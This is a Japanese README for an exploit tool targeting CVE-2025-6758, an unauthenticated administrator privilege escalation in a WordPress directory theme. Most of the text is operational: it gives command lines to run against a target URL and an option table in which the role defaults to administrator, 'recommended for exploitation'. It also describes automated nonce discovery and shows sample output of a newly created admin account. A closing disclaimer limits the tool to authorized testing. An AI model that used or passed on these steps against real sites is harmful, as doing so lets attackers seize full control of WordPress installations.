
Real Spaces - WordPress Properties Directory Theme <= 3.6 - 未認証の管理者への権限昇格
imic_agent_register を介した未認証の管理者権限昇格CVE-2025-6758
CVSS スコア: 9.8 (Critical)
WordPress 用の Real Spaces - WordPress Properties Directory テーマ は、バージョン 3.6 以前のすべてのバージョンにおいて、imic_agent_register 関数を介した権限昇格の脆弱性の影響を受けます。
この脆弱性は、登録時のロール割り当てに対する制限が不十分なことに起因し、未認証の攻撃者が新規ユーザー登録時に Administrator を含む任意のロールを指定できるようになります。
この重大な欠陥により、リモートの攻撃者は脆弱なバージョンのテーマを実行している WordPress サイトへの完全な管理者アクセスを取得でき、影響を受けるシステムの完全性とセキュリティを危険にさらします。
CVE-2025-6758.py は、この脆弱性を実証および悪用するために Python で書かれたプロフェッショナルなエクスプロイト兼自動化スクリプトです。
このスクリプトは、ペネトレーションテスターやセキュリティ研究者向けに構築されており、自動化された発見、nonce 抽出、そして悪用を、信頼性が高くモジュール式でサイレントな方法で提供します。
python3 CVE-2025-6758.py -u http://TARGET/wordpress/
--username カスタムユーザー名を設定(デフォルト: Nxploited)--password カスタムパスワードを設定(デフォルト: 123456789)--email カスタムメールアドレスを設定(デフォルト: [email protected])--position カスタム役職(position)を設定(デフォルト: Nxploitedadmin)--role ユーザーロールを設定(デフォルト: administrator)--max-pages nonce 発見のためにクロールする最大ページ数(デフォルト: 30)--max-depth リンククロールの最大深度(デフォルト: 2)--scan-common-paths 追加の登録/プラグイン/テーマパスをスキャン--ajax-path カスタム AJAX POST エンドポイント(デフォルト: wp-admin/admin-ajax.php)--verify-ssl SSL 証明書の検証を有効化--cookie-save セッション Cookie を保存するパス--save-json nonce 発見結果を JSON として保存するパスpython3 CVE-2025-6758.py -u http://192.168.100.74:888/wordpress/ --username AdminX --password MySecretPass123 --scan-common-paths --debug
エクスプロイトが成功すると、スクリプトは以下を出力します:
[+] Exploitation successful.
[+] Server message: You're successfully register
[+] Username: Nxploited
[+] Password: 123456789
[+] Email: [email protected]
エクスプロイトが失敗した場合や nonce が見つからない場合は、詳細なエラーメッセージとさらなるトラブルシューティングのヒントが表示されます。
このスクリプトは、教育、研究、および許可を得たペネトレーションテストのみを目的としています。
所有者から明示的な書面による許可を得ずに、ウェブサイトやシステムに対して不正に使用することは固く禁止されており、違法となる可能性があります。
作者は、このスクリプトの使用に起因する誤用や損害について一切の責任を負いません。
📧 メール: [email protected]
📨 Telegram: @Kxploit
📡 Telegram チャンネル: @KNxploited
作者: Nxploited ( Khaled Alenazi )
| 引数 | デフォルト値 | 説明 |
|---|
--username | Nxploited | 登録用のカスタムユーザー名を設定 |
--password | 123456789 | 登録用のカスタムパスワードを設定 |
--email | [email protected] | カスタムメールアドレスを設定 |
--position | Nxploitedadmin | カスタム役職(position)値を設定 |
--role | administrator | 登録ロールを設定(悪用には Administrator を推奨) |
--max-pages | 30 | nonce 発見のためにクロールする最大ページ数 |
--max-depth | 2 | リンククロールの最大深度 |
--scan-common-paths | None | nonce 探索用に追加の登録/プラグイン/テーマパスをスキャン(フラグのみ) |
--ajax-path | wp-admin/admin-ajax.php | カスタム AJAX POST エンドポイント |
--verify-ssl | None | SSL 証明書の検証を有効化(フラグのみ) |
--cookie-save | None | セッション Cookie を保存するパス(pickle 形式) |
--save-json | None | nonce 発見結果を JSON として保存するパス |
--debug | None | デバッグログを有効化し HTML/JS スニペットを出力(フラグのみ) |
--debug デバッグログを有効化し HTML/JS スニペットを出力